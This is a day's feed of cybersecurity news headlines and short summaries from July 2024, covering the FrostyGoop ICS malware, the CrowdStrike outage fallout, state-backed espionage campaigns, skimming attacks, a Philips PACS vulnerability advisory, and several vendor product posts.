In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered an that a nation-state […]

by Security Affairs

2024-07-23 20:30:44

Impact of Microsoft Copilot+ Recall on corporate cybersecurity

How to prepare IT systems and employees for the arrival of visual AI assistants from Microsoft, Google, and Apple.

by Kaspersky

2024-07-23 20:29:26

Russia Adjusts Cyber Strategy for the Long Haul in War With Ukraine

Russia has cast aside its focus on civilian infrastructures and is instead targeting Ukraine''s military operations in myriad ways.

by Dark Reading

2024-07-23 19:41:51

Phish-Friendly Domain Registry “.top” Put on Notice

The Chinese company in charge of handing out domain names ending in “.top” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. The warning comes amid the release of new findings that .top was the most common suffix in phishing websites over the past year, second only to domains ending in “.com.”

by Krebs on Security

2024-07-23 19:39:56

China's ''Evasive Panda'' APT Spies on Taiwan Targets Across Platforms

The cohort''s variety of individual tools covers just about any operating system it could possibly wish to attack.

by Dark Reading

2024-07-23 19:33:36

Chinese hackers deploy new Macma macOS backdoor version

The Chinese hacking group tracked as ''Evasive Panda'' was spotted using new versions of the Macma backdoor and the Nightdoor Windows malware. [...]

by BleepingComputer

2024-07-23 19:16:12

Goodbye? Attackers Can Bypass 'Windows Hello'' Strong Authentication

Accenture researcher undercut WHfB''s default authentication using open source Evilginx adversary-in-the-middle (AitM) reverse-proxy attack framework.

by Dark Reading

2024-07-23 19:09:07

Sophos Firewall v20 MR2 is now available

Sophos Firewall OS v20 MR2 is a free upgrade for all licensed Sophos Firewall customers.

by Sophos News

2024-07-23 18:41:55

Hamster Kombat’s 250 million players targeted in malware attacks

Threat actors are taking advantage of the massive popularity of the Hamster Kombat game, targeting players with fake Android and Windows software that install spyware and information-stealing malware. [...]

by BleepingComputer

2024-07-23 18:40:49

CrowdStrike global outage: Sophos guidance

Our take on what happened and answers to key questions from Sophos customers and partners.

by Sophos News

2024-07-23 18:23:48

Sprawling CrowdStrike Incident Mitigation Showcases Resilience Gaps

A painful recovery from arguably one of the worst IT outages ever continues, and the focus is shifting to what can be done to prevent something similar from happening again.

by Dark Reading

2024-07-23 18:11:24

Custom Inbox Enhancements: Revolutionizing Vulnerability Management for Enterprises

Custom Inbox Enhancements: Revolutionizing Vulnerability Management for Enterprises Morgan Pearson Tue, 07/23/2024 - 11:11 Body Introducing Custom InboxesCustom Inboxes provide our enterprise customers with unparalleled flexibility in report management. Now, organizational administrators can create, remove, and edit up to 300 custom inboxes, structured in collections that align with their team, business unit, or asset organization. This segmentation allows for a more tailored approach to managing and processing reports.Key FeaturesReport Allocation: Assign reports to specific teams, business units, and assets.API Report Routing: Automate the routing of engagement reports to custom inboxes using our Inbox API.Create / Remove / Edit Custom Inboxes: Up to 300 custom inboxes can be managed by organizational administrators.Streamline Report Management with Custom InboxesEnhanced Report ManagementCustomers can now manage reports in collections that match their organizational structure. This means each team, business unit, or asset can have a dedicated inbox, ensuring that reports are handled by the appropriate users. For example, an operational team responsible for validating vulnerabilities can access relevant reports without the ability to suggest or make reward payments, while a central business unit managing multiple subsidiaries can view all reports in a single inbox.Improved Efficiency and Reduced RiskBy segmenting reports and managing access more effectively, customers can streamline their report management workflows. This reduces the risk of vulnerabilities and access exposures. Custom inboxes ensure that only authorized users and user groups have access to specific reports, enhancing security and efficiency.Automated Report RoutingWith the Inbox API functionality, customers can automate the routing of engagement reports to their chosen custom inboxes. This reduces manual tasks and ensures that reports are quickly and accurately directed to the appropriate teams or business units.3 Game-Changing Custom Inbox EnhancementsWe are excited to share additional capabilities to enhance the Custom Inbox experience further:Notifications: Customers will receive alerts when a vulnerability report is assigned to a custom inbox, ensuring timely attention and action.Analytics: Customers will soon be able to view data and statistics for vulnerability reports per custom inbox, providing valuable insights into report management and performance.Automation: Automation capabilities help customers reduce repetitive tasks across the vulnerability lifecycle within the HackerOne platform. This includes report allocation to predefined custom inboxes based on the predefined report or inbox criteria of your choice.We’re committed to continuously improving our platform to meet our customers'' needs. The Custom Inbox Enhancements greatly benefit enterprise customers by providing a more efficient, secure, and flexible way to manage vulnerability reports. Stay tuned for more updates and features coming your way!For any questions or feedback about the new Custom Inbox Enhancements, please reach out to the HackerOne support team. We''re here to help you get the most out of this powerful new feature. Excerpt HackerOne''s Custom Inboxes Enhancements provide flexible report segmentation, reduce administrative overhead, and mitigate security risks. Main Image

by HackerOne

2024-07-23 17:58:00

Chinese Hackers Target Taiwan and U.S. NGO with MgBot and MACMA Malware

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools. The campaign is a sign that the group ""also engages in internal espionage,"" Symantec''s Threat Hunter Team, part of Broadcom, said in a new report published today. ""In the attack on

by The Hacker News

2024-07-23 17:55:11

Phishing Campaigns Abuse Cloud Platforms to Target Latin America

Several threat actors are abusing legitimate cloud services to launch phishing attacks against users in Latin America, according to Google’s latest Threat Horizons Report.

by KnowBe4

2024-07-23 17:55:08

Is Your Bank Really Calling? How to Protect Yourself from Financial Impersonation Fraud

Protecting your financial information has never been more crucial. With the rise of sophisticated scams, it''s becoming increasingly difficult to distinguish between legitimate bank communications and fraudulent attempts to access your accounts. So, how can you be sure it''s really your bank contacting you?

by KnowBe4

2024-07-23 17:55:04

Crypto Data Breach Continues to Fuel Phishing Scams Years Later

According to security researchers at Cisco Talos, emails impersonating legitimate officers at the Cyprus Securities and Exchange Commission are being sent to prior Opteck customers that offer victim''s with investment advice.

by KnowBe4

2024-07-23 17:48:32

Windows 10 KB5040525 fixes WDAC issues causing app failures, memory leak

Microsoft has released the July 2024 preview update for Windows 10, version 22H2, with fixes for Windows Defender Application Control (WDAC) issues causing app crashes and system memory exhaustion. [...]

by BleepingComputer

2024-07-23 17:32:56

10 essential steps for transitioning from VPN to Zero Trust Access

Migrate to Zero Trust Access with confidence. Barracuda’s network security experts have you covered with this essential starter kit.

by Barracuda

2024-07-23 17:28:44

Play Ransomware Variant Targeting Linux ESXi Environments

Play Ransomware Targets Linux! New Variant Attacks ESXi with Prolific Puma Ties. Learn how to protect your organization…

by Hackread

2024-07-23 17:28:22

Hackers abused swap files in e-skimming attacks on Magento sites

Threat actors abused swap files in compromised Magento websites to hide credit card skimmer and harvest payment information. Security researchers from Sucuri observed threat actors using swap files in compromised Magento websites to conceal a persistent software skimmer and harvest payment information. The attackers used this tactic to maintain persistence and allowing the malware to […]

by Security Affairs

2024-07-23 16:57:14

Adventures in Shellcode Obfuscation! Part 6: Two Array Method

by Mike Saunders, Principal Security Consultant     This blog is the sixth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of […]

by Red Siege Blog

2024-07-23 16:24:00

New ICS Malware 'FrostyGoop'' Targeting Critical Infrastructure

Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January. Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP

by The Hacker News

2024-07-23 16:21:16

Attackers Exploit 'EvilVideo'' Telegram Zero-Day to Hide Malware

An exploit sold on an underground forum requires user action to download an unspecified malicious payload.

by Dark Reading

2024-07-23 16:16:00

Tenable’s Software Update Process Protects Customers’ Business Continuity with a Safe, Do-No-Harm Design

With the unprecedented tech outages experienced by so many of our customers over the last week, we recognize the need for deeper understanding of our software development processes and how they support global business continuity. In this blog post, we’ll outline how Tenable’s comprehensive approach to the software development lifecycle (SDLC) allows us to produce extremely high-quality software and protect our customers’ business operations with a secure, do-no-harm approach. Tenable rigorously manages every step in the software development lifecycle (SDLC) – research, design, development, testing and release – which results in software that’s stable, tested, accurate and timely. Specifically, Tenable makes software-design choices that prioritize flexibility and give customers control over the deployment of our software releases and updates.For example, customers can control when or if the Nessus Agent and its plugins are updated within their environment. Additionally, the Nessus Agent operates in the kernel’s “user space,” reducing the risk of operating system faults. Features such as these put the ultimate power in the hands of customer change-control programs and lower the risk of incidents, such as the one that caused the global IT outage last week.Below we provide more details.Declarative plugin version control featureSupporting our customers'' change-control management processes, Tenable provides the flexibility to choose from multiple options for how the plugin content version is applied across agent deployments. This offers customers the control to validate and test Tenable plugins before performing an enterprise deployment. Do-no-harm Nessus Agent designThe Tenable Nessus Agent is designed so that it executes solely in the user space and limits its interaction with the endpoint''s kernel to standard system calls as provided by the operating system, such as event notification callbacks. As such, the Tenable Nessus Agent does not require any Tenable-developed components to reside inside the operating system kernel. This design is intentional in order to reduce catastrophic impacts to the endpoint''s operating system. It also prevents the Tenable Agent from impacting an endpoint''s ability to boot properly.User-space applications do not have direct access to the kernel or hardware. Therefore, they cannot directly cause the types of failures that lead to a “blue screen of death” in a Windows system.Nessus Agent software version control featuresEnabling our customers'' enterprise change-control procedures is at the top of Tenable''s mind. With Tenable Vulnerability Management and with Nessus Manager for Security Center integrations, we provide multiple options for customers to apply software version control for their Nessus agents. These options allow customers to test and validate the Nessus Agent before performing an enterprise deployment. Depending on their business needs, customers may choose to leverage this feature.We hope this blog post has provided you with a clear idea of how Tenable strives to design and deliver software with the highest degree of security and quality, guided by our top priority – to keep our customers safe and protect their businesses.Please contact us if you wish to get more information about our software development processes.

by Tenable

2024-07-23 16:08:01

DeFi exchange dYdX v3 website hacked in DNS hijack attack

Decentralized finance (DeFi) crypto exchange dYdX announced on Tuesday that the website for its older v3 trading platform has been compromised. [...]

by BleepingComputer

2024-07-23 15:43:00

How to Securely Onboard New Employees Without Sharing Temporary Passwords

The initial onboarding stage is a crucial step for both employees and employers. However, this process often involves the practice of sharing temporary first-day passwords, which can expose organizations to security risks. Traditionally, IT departments have been cornered into either sharing passwords in plain text via email or SMS, or arranging in-person meetings to verbally communicate these

by The Hacker News

2024-07-23 15:42:00

Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files

Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information. The sneaky technique, observed by Sucuri on a Magento e-commerce site''s checkout page, allowed the malware to survive multiple cleanup attempts, the company said. The skimmer is designed to capture all the data into the credit card form on the

by The Hacker News

2024-07-23 15:15:55

Meta Llama 3.1 now available on Workers AI

Cloudflare is excited to be a launch partner with Meta to introduce Workers AI support for Llama 3.1

by Cloudflare

2024-07-23 15:12:31

Want to Gain Control of Your Cloud Costs? Give Engineering More Ownership

As cloud spending surges, organizations face challenges in cost management and visibility. Here''s why you should give engineers ownership over cloud expenses.

by ITPro Today

2024-07-23 15:07:00

Meta Given Deadline to Address E.U. Concerns Over 'Pay or Consent'' Model

Meta has been given time till September 1, 2024, to respond to concerns raised by the European Commission over its ""pay or consent"" advertising model or risk-facing enforcement measures, including sanctions. The European Commission said the Consumer Protection Cooperation (CPC) Network has notified the social media giant that the model adopted for Facebook and Instagram might potentially violate

by The Hacker News

2024-07-23 15:03:56

Google admits it can’t quite quit third-party cookies

Google has taken a new turn in the approach to eliminating third-party cookies. This time it''s back to the Privacy Sandbox

by Malwarebytes Labs

2024-07-23 14:46:57

How to choose an MDR vendor: 6 questions to ask

by ThreatDown

2024-07-23 14:33:00

Ukrainian Institutions Targeted Using HATVIBE and CHERRYSPY Malware

The Computer Emergency Response Team of Ukraine (CERT-UA) has alerted of a spear-phishing campaign that targeted a scientific research institution in the country with malware known as HATVIBE and CHERRYSPY. The agency attributed the attack to a threat actor it tracks under the name UAC-0063, which was previously observed targeting various government entities to gather sensitive information using

by The Hacker News

2024-07-23 14:14:55

How a North Korean Fake IT Worker Tried to Infiltrate Us

Incident Report Summary: Insider Threat First of all: No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems. This is not a data breach notification, there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don''t let it happen to you.  Story updated 7/24/2024. TLDR: KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware. Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application. Additionally, a background check and all other standard pre-hiring checks were performed and came back clear due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The picture was AI ""enhanced"".  The EDR software detected it and alerted our InfoSec Security Operations  Center. The SOC called the new hire and asked if they could help. That''s when it got dodgy fast. We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea. The picture you see is an AI fake that started out with stock photography (below). The detail in the following summary is limited because this is an active FBI investigation. 

by KnowBe4

2024-07-23 14:04:00

CrowdStrike CEO’s quick apology stands out in an industry rife with deflection

The cybersecurity vendor’s swift and contrite response helped the company convey confidence and control over the mess it created, experts say.

by Cybersecurity Dive

2024-07-23 14:00:00

Wanted: An SBOM Standard to Rule Them All

A unified standard is essential for realizing the full potential of SBOMs in enhancing software supply chain security.

by Dark Reading

2024-07-23 14:00:00

Introducing Layered Analysis for Enhanced Container Security

Containerized applications deliver exceptional speed and flexibility, but they also bring complex security challenges, particularly in managing and mitigating vulnerabilities... The post Introducing Layered Analysis for Enhanced Container Security appeared first on Sysdig.

by Sysdig

2024-07-23 13:56:16

Mexico’s Largest ERP Provider ClickBalance Exposes 769 Million Records

ClickBalance ERP provider’s cloud database exposed 769 million records, including API keys and email addresses. Learn how this…

by Hackread

2024-07-23 13:40:56

Shocked, Devastated, Stuck: Cybersecurity Pros Open Up About Their Layoffs

Here''s a dose of reality from those on the frontlines and how they''re coping.

by Dark Reading

2024-07-23 13:39:27

Senate Democrats Demand OpenAI Detail Efforts To Make Its AI Safe

Following a Washington Post report, five Senate Democrats ask the artificial intelligence start-up to describe how it will ensure its tools don’t cause harm.

by ITPro Today

2024-07-23 13:00:44

More From Our Main Blog: SentinelOne Increases SOC Capabilities With Cloud Native Security (CNS)

Learn how SentinelOne''s Cloud Native Security helps your security teams gain greater visibility and boost investigation efficiency. The post SentinelOne Increases SOC Capabilities With Cloud Native Security (CNS) appeared first on SentinelOne.

by SentinelOne

2024-07-23 13:00:00

The Imperative of Threat Hunting for a Mature Security Posture

Threat Hunting has transitioned from being a luxury to a fundamental necessity The post The Imperative of Threat Hunting for a Mature Security Posture   appeared first on Binary Defense.

by Binary Defense

2024-07-23 13:00:00

Zimperium is Named a Leader in the Forrester Wave™ for MTD

We are excited to share that Zimperium has been named a Leader in The Forrester Wave ™ : Mobile Threat Defense Solutions, Q3 2024. The post Zimperium is Named a Leader in the Forrester Wave™ for MTD appeared first on Zimperium.

by Zimperium

2024-07-23 12:06:00

Innovations to power secure-by-design development

by ComputerWeekly

2024-07-23 12:01:16

Sophos Germany Team Saddles Up for a Volunteering Day at Horse Therapy Farm

Sophos Employee Volunteering Program supports local equine-assisted therapy initiative.

by Sophos News

2024-07-23 11:03:53

CISOs and CIOs confront growing data protection challenges in the era of AI and cloud

Keepit, a global provider of a comprehensive cloud backup and recovery platform, today released a survey conducted by Foundry, as well as a study based on in-depth interviews conducted by Keepit. Both reveal critical gaps in disaster recovery strategies and highlight the pressing need for enhanced data security measures. In an evolving technological landscape, enterprise […] The post CISOs and CIOs confront growing data protection challenges in the era of AI and cloud first appeared on IT Security Guru. The post CISOs and CIOs confront growing data protection challenges in the era of AI and cloud appeared first on IT Security Guru.

by IT Security Guru

2024-07-23 11:01:05

Fake CrowdStrike hot fix leads to Remcos Trojan

To nobody''s surprise, cybercriminals are abusing the CrowdStrike outage.

by ThreatDown

2024-07-23 11:00:00

What is the Driver's Privacy Protection Act (DPPA)?

by ComputerWeekly

2024-07-23 11:00:00

Women in IT Security Lack Opportunities, Not Talent

Much work remains to be done to ensure equal opportunities and a supportive environment for women in IT security.

by ITPro Today

2024-07-23 11:00:00

How To Deploy Your App on Microsoft HoloLens 2

Follow these steps to run your app on a HoloLens 2 device.

by ITPro Today

2024-07-23 10:48:45

Summertime, and the Zooming Is Easy

The flexible workplace has been great for employees'' perceptions of greater work-life balance — but there''s something to be said for completely disengaging from any workplace.

by ITPro Today

2024-07-23 10:46:53

Dragos warns of novel malware targeting industrial control systems

FrostyGoop, the ninth ICS-specific malware observed by Dragos, was linked to a January attack on an energy provider in Ukraine.

by Cybersecurity Dive

2024-07-23 10:44:38

Enhancing the cybersecurity talent pool is key to securing our digital future

As the global digital industry continues to grow, there has been an increased demand for both businesses and Governments to prioritise cybersecurity. Cybercrime rates are quickly rising as according to Cybersecurity Ventures, damage costs are set to increase by 15% per year until 2025 where it’s estimated that global expenditure on cybercrime could reach US$10.5 […] The post Enhancing the cybersecurity talent pool is key to securing our digital future first appeared on IT Security Guru. The post Enhancing the cybersecurity talent pool is key to securing our digital future appeared first on IT Security Guru.

by IT Security Guru

2024-07-23 10:34:25

Privilege escalation: unravelling a novel cyber-attack technique

Cyber criminals are notoriously relentless and unforgiving in their quest to exploit vulnerabilities through ever-evolving tactics. Organisations may believe that their security frameworks are robust, but when confronted with unprecedented attack methods, nobody is entirely immune to infiltration. Earlier this year, a multinational agriculture company learnt this the hard way when they fell victim to […] The post Privilege escalation: unravelling a novel cyber-attack technique first appeared on IT Security Guru. The post Privilege escalation: unravelling a novel cyber-attack technique appeared first on IT Security Guru.

by IT Security Guru

2024-07-23 10:19:27

The global computer blackout – RTS interview

Planes grounded, trains at a standstill, stock exchanges affected and problems in hospitals: a vast computer breakdown affected numerous services around the world on Friday 19th July. The post The global computer blackout – RTS interview appeared first on ZENDATA Cybersecurity.

by Zendata

2024-07-23 10:00:19

Vulnerabilities in LangChain Gen AI

This article is a detailed study of CVE-2023-46229 and CVE-2023-44467, two vulnerabilities discovered by our researchers affecting generative AI framework LangChain. The post Vulnerabilities in LangChain Gen AI appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-23 09:58:00

Google Abandons Plan to Phase Out Third-Party Cookies in Chrome

Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger set of a controversial proposal called the Privacy Sandbox. ""Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web

by The Hacker News

2024-07-23 09:43:00

Why did CrowdStrike cause the Windows Blue Screen?

by ComputerWeekly

2024-07-23 09:00:45

Strengthen Your Cybersecurity: Understanding the NIS 2 Directive

Key insights into the NIS 2 Directive in this essential guide to new cybersecurity compliance for 2024.

by Sophos News

2024-07-23 09:00:00

Novel ICS Malware Sabotaged Water-Heating Services in Ukraine

Newly discovered "FrostyGoop" is the first ICS malware that can communicate directly with operational technology systems via the Modbus protocol.

by Dark Reading

2024-07-23 09:00:00

Hackers shut down heating in Ukrainian city with malware, researchers say

Cybersecurity firm Dragos and Ukrainian authorities found a cyberattack targeting critical infrastructure in Lviv. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-23 09:00:00

If You Only Have Five Minutes, Here’s CNAPP in a Snap (But We Have an eBook, Too)

If you’re a bit puzzled by all the talk about cloud native application protection platforms (CNAPPs), worry not. Our new eBook “Empower Your Cloud: Mastering CNAPP Security” explains in plain English what CNAPP is, how it works and why it’ll help you secure your cloud environment confidently. Read on to check out the eBook’s main highlights.As organizations move operations to the cloud, the need for robust security measures has never been more critical. Cloud native application protection platforms (CNAPPs) offer comprehensive solutions designed to tackle the myriad threats and vulnerabilities that accompany cloud infrastructures.Tenable recently published an eBook — “Empower Your Cloud: Mastering CNAPP Security.” You can download it here. This post summarizes the key points. But read the book to get the full story.The misunderstood shared responsibility modelCloud security was built on a misleading concept: the shared responsibility model. On its surface, the “shared responsibility” merely outlines the individual security responsibilities of cloud providers and customers. It seems pretty straightforward and the model does provide a framework for understanding security responsibilities. But customer beware: It usually places the onus on you to implement and maintain robust security measures. A cottage industry rises to add to the confusionIn response to the rush to the cloud, a cottage industry of solutions have popped up that handle a tiny sliver of the cloud security challenge. The end result is product fatigue. In the age of limited resources, when your day job has you focused on threats like ransomware and trying to ensure compliance, there are only so many alerts and systems you can pay attention to. After a while it’s just all noise.Meanwhile, cloud breaches are almost universalAmid that noise, the prevalence of cloud breaches underscores the urgency for more complete security measures. In Tenable''s recent ""Cloud Security Outlook"" report, a staggering 95% of security professionals surveyed reported experiencing a cloud breach within an 18-month period, with an average of 3.6 breaches per respondent. These statistics highlight the pervasive nature of cloud security risks and the need for proactive measures to mitigate them.(Source: Tenable''s ""Cloud Security Outlook"" report, May 2024) Amid that noise, the prevalence of cloud breaches underscores the urgency for more complete security measures. CNAPPs to the rescueCNAPP solutions replace that patchwork of siloed products that often cause more problems than they solve. Those products usually provide only partial coverage and often create overhead and friction with the products they’re supposed to work with. And, in today''s multi-cloud landscape, organizations often work with multiple cloud providers to optimize services and avoid vendor lock-in. The complexity of securing the cloud is multiplied when it becomes plural: Clouds. Managing security across heterogeneous cloud infrastructures is a big challenge. Plus, traditional security tools provided by individual cloud vendors are often limited to their respective platforms, leading to fragmented security postures. A comprehensive CNAPP solution includes a wide variety of essential capabilities, including:Cloud security posture management (CSPM)Cloud infrastructure entitlement management (CIEM)Cloud workload protection (CWP)Kubernetes security posture management (KSPM)Infrastructure as code (IaC) scanning Cloud detection and response (CDR) Data security posture management (DSPM)Must-have CNAPP componentsAs you evaluate CNAPPs, make sure you cover your bases on three key components: Identity and access management to ensure “least privilege” access; vulnerability management to prioritize and remediate vulnerabilities based on their potential impact; and exposure management to gain visibility across cloud environments and mitigate risks that stem from the toxic combinations of vulnerabilities, misconfigurations, and excessive permissions.How CNAPPs can help youCNAPPs benefit a wide range of stakeholders involved in cloud security, including security, DevOps, DevSecOps, IAM, and IT teams. A CNAPP also helps those disparate groups collaborate to reduce cloud environment risks.Enterprises stand to gain a number of advantages, including enhanced visibility, consistent security posture, streamlined infrastructure health, minimal overhead, seamless integration, shift-left security and holistic security coverage. Check out this short video, in which a Tenable security engineer explains some CNAPP benefits experienced by Tenable customers.Learn moreTo learn more about CNAPPs, read our new eBook “Empower Your Cloud: Mastering CNAPP Security.”

by Tenable

2024-07-23 09:00:00

How Russia-Linked Malware Cut Heat to 600 Ukrainian Buildings in Deep Winter

The code, the first of its kind, was used to sabotage a heating utility in Lviv at the coldest point in the year—what appears to be yet another innovation in Russia’s torment of Ukrainian civilians.

by WIRED Security News

2024-07-23 08:46:00

CrowdStrike says flawed update was live for 78 minutes

Though CrowdStrike pulled the update, companies across sectors were already dealing with the cascading consequences that required manual remediations.

by Cybersecurity Dive

2024-07-23 08:45:36

US Gov sanctioned key members of the Cyber Army of Russia Reborn hacktivists group

The US government sanctioned two Russian hacktivists for their cyberattacks targeting critical infrastructure, including breaches of water facilities. The United States sanctioned Russian hacktivists Yuliya Vladimirovna Pankratova and Denis Olegovich Degtyarenko, members of the Russian hacktivist group Cyber Army of Russia Reborn (CARR), for their roles in cyber operations against U.S. critical infrastructure. The US […]

by Security Affairs

2024-07-23 08:01:46

Unveiling the Scam: How Fraudsters Abuse Legitimate Blockchain Protocols to Steal Your Cryptocurrency Wallet

Research by Dikla Barda, Roman Ziakin and Oded Vanunu Check Point’s Threat Intel blockchain system identified and alerted that in recent times, fraudsters have evolved to become increasingly sophisticated, exploiting legitimate blockchain protocols to conduct their scams. The Uniswap Protocol, launched in 2018, is the largest and most popular decentralized exchange for swapping cryptocurrency tokens […] The post Unveiling the Scam: How Fraudsters Abuse Legitimate Blockchain Protocols to Steal Your Cryptocurrency Wallet appeared first on Check Point Research.

by Check Point Research

2024-07-23 07:17:54

Powering People-Centric HR Practices with Generative AI

As we grapple with the ongoing phenomenon of the generative AI (GenAI) boom, one thing we’ve consistently observed is that businesses keep interacting with data in ways that haven’t been previously accounted for. For HR leaders who deal with that most sensitive of data types – data involving people – prioritizing data security has never been more essential. At Forcepoint,...

by Forcepoint Blog

2024-07-23 05:56:00

You’re now part of an inside job! Season 6 brings you into the world of heists

Your third rift has brought you some sense of normalcy. But don’t get too comfy, there’s work to be done.

by Hack The Box Blog

2024-07-23 05:39:09

Philips Discloses Multiple VUE PACS Vulnerabilities: Healthcare Sector Walking on Thin Ice

Internet Exposed VUE PACS a Storm Brewing in Hindsight On July 18, 2024, Philips issued a security advisory addressing vulnerabilities within Philips Vue Picture Archiving and Communication System (PACS) versions prior to 12.2.8.410.   The Philips Vue PACS is a sophisticated medical imaging solution used to manage, store, and transmit digital medical images and reports. Primarily employed in hospitals, diagnostic imaging centers, and other healthcare facilities, this system facilitates the storage and retrieval of images from multiple modalities such as X-rays, MRI, CT scans, and ultrasound. The PACS integrates with Electronic Medical Records (EMR) and Radiology Information Systems (RIS), allowing healthcare professionals to access and share patient images and reports seamlessly, improving diagnostic accuracy and patient care.  By streamlining workflows and improving access to critical imaging data, Philips Vue PACS is intended to enhance clinical decision-making and operational efficiency in the Healthcare and Public Health Sectors.  Among the thirteen vulnerabilities disclosed by Philips to government agencies, including the U.S. Cybersecurity Infrastructure and Security Agency (CISA), the majority of vulnerabilities fall under the High and Critical severity category (as shown in Table 1).  Cyberattacks targeting the healthcare sector are on the rise, posing significant threats to patient safety, data privacy, and the operational stability of medical institutions. Recent vulnerabilities, such as those identified in Philips Vue PACS, exacerbate these risks, making healthcare systems more susceptible to exploitation. Upon successful exploitation, attackers could potentially gain unauthorized access to sensitive patient data, disrupt critical medical services, and even manipulate diagnostic information.    The table below provides details on the recent vulnerabilities.  CVE  Vulnerability Type  CVSS 3.1  CVSS4  CVE-2020-36518  Out of Bonds Write  5.3  7.1  CVE-2020-11113  Deserialization of Untrusted Data  8.8  7.1  CVE-2020-35728  Deserialization of Untrusted Data  8.1  9.3  CVE-2021-20190  Deserialization of Untrusted Data  8.1  9.3  CVE-2020-14061  Deserialization of Untrusted Data  8.1  9.3  CVE-2020-10673  Deserialization of Untrusted Data  8.8  8.7  CVE-2019-12814  Deserialization of Untrusted Data  5.9  8.7  CVE-2017-17485  Deserialization of Untrusted Data  9.8  9.3  CVE-2021-28165  Uncontrolled Resource Consumption  7.5  8.8  CVE-2023-40704  Use of Default Credentials  7.1  8.4  CVE-2023-40539  Weak Password Requirement  4.4  4.8  CVE-2023-40159  Exposure of Sensitive Information to an Unauthorized Actor  8.2  8.8  Table 1: Vulnerability details of Philips VUE PACS  Patch Details  For vulnerabilities CVE-2020-36518, CVE-2020-11113, CVE-2020-35728, CVE-2021-20190, CVE-2020-14061, CVE-2020-10673, CVE-2019-12814, CVE-2017-17485, CVE-2023-40223, and CVE-2023-40159, Philips recommends upgrading to the latest Vue PACS version 12.2.8.400* released in August 2023. -  Link.  For CVE-2021-28165, Philips recommends configuring the Vue PACS environment per D000763414 – Vue_PACS_12_Ports_Protocols_Services_Guide available on Incenter. Philips also recommends upgrading to the Vue PACS version 12.2.8.410* released in October 2023 - Link.  For CVE-2023-40704 and CVE-2023-40539, Philips recommends configuring the Vue PACS environment per 8G7607 – Vue PACS User Guide Rev G available on Incenter - Link.   Philips VUE PACS’ Internet Exposure  The disclosed vulnerabilities (Table 1) can be exploited remotely and have low attack complexity. Hence, Cyble Research and Intelligence Labs (CRIL) investigated the impacted product''s internet exposure and observed the 495 internet-exposed Philips VUE PACS.  It was observed that Brazil and the United States had the highest number of Philips VUE PACs exposure; the graph below provides insights into the Top 5 countries with the highest number of exposures.   CRIL''s investigation discovered that the internet-exposed PACs are being used by multiple Healthcare facilities globally, as shown in the screenshot below.  Figure 1- Screenshot indicating VUE PACs utilized by Healthcare facilities  Conclusion  The Healthcare and Public Health sectors are vastly dependent on Picture Archiving and Communication Systems (PACs) due to their nature of operations within this environment; at the same time, the operations performed via PACs become a lucrative target for Threat Actors (TAs).   The recent vulnerabilities within Philips VUE PACs and the affected product''s internet exposure might be leveraged by TAs in the near future for data breaches that compromise patients'' privacy, undermine trust in healthcare institutions, and even jeopardize patient safety by delaying critical medical diagnoses and treatments.   Therefore, regular patching and updating of PACS are essential steps that need to be continuously taken to verify the security and integrity of healthcare operations, protect patient information, and maintain the overall resilience of healthcare services.  Recommendations  Implement the latest patch released by the official vendor: Regularly update all software and hardware systems with the latest patches from official vendors to mitigate vulnerabilities and protect against exploits. Establish a routine schedule for patch application and ensure critical patches are applied immediately.  Implement proper network segmentation to avoid exposing critical assets over the Internet: Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.  Incident response and recovery plan: Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.  Vulnerability Assessment and Penetration Testing (VAPT) exercises and auditing: Conduct regular VAPT exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.  Enhance your visibility into your organization''s external and internal assets: Maintain an up-to-date inventory of all internal and external assets, including hardware, software, and network components. Use asset management tools and continuous monitoring to ensure comprehensive visibility and control over your IT environment.  References:  https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-200-01https://www.philips.com/a-w/security/security-advisories.html The post Philips Discloses Multiple VUE PACS Vulnerabilities: Healthcare Sector Walking on Thin Ice  appeared first on Cyble.

by CYBLE

2024-07-23 03:04:35

Wiz walks away from Google’s $23B acquisition offer: Read the CEO’s note to employees

Cybersecurity startup Wiz has turned down a $23 billion acquisition offer from Alphabet, Google’s parent company, according to a source familiar with discussions. Despite the offer representing a substantial premium over its last private valuation of $12 billion, Wiz’s management team with the support of investors has opted to remain independent, the person said. Wiz’s […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-23 00:00:00

ZDI-24-957: (0Day) Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability

